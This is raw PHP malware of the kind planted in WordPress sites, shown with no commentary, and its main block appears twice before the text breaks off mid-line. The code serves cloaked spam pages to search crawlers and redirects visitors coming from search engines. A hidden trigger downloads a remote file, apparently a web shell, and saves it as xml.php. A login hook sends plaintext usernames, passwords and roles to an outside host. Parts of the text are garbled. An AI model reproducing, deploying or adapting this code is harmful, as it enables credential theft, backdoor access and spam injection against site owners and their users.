if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?> if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!<br><a href=/{$eb}xml.php>go</a>"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', 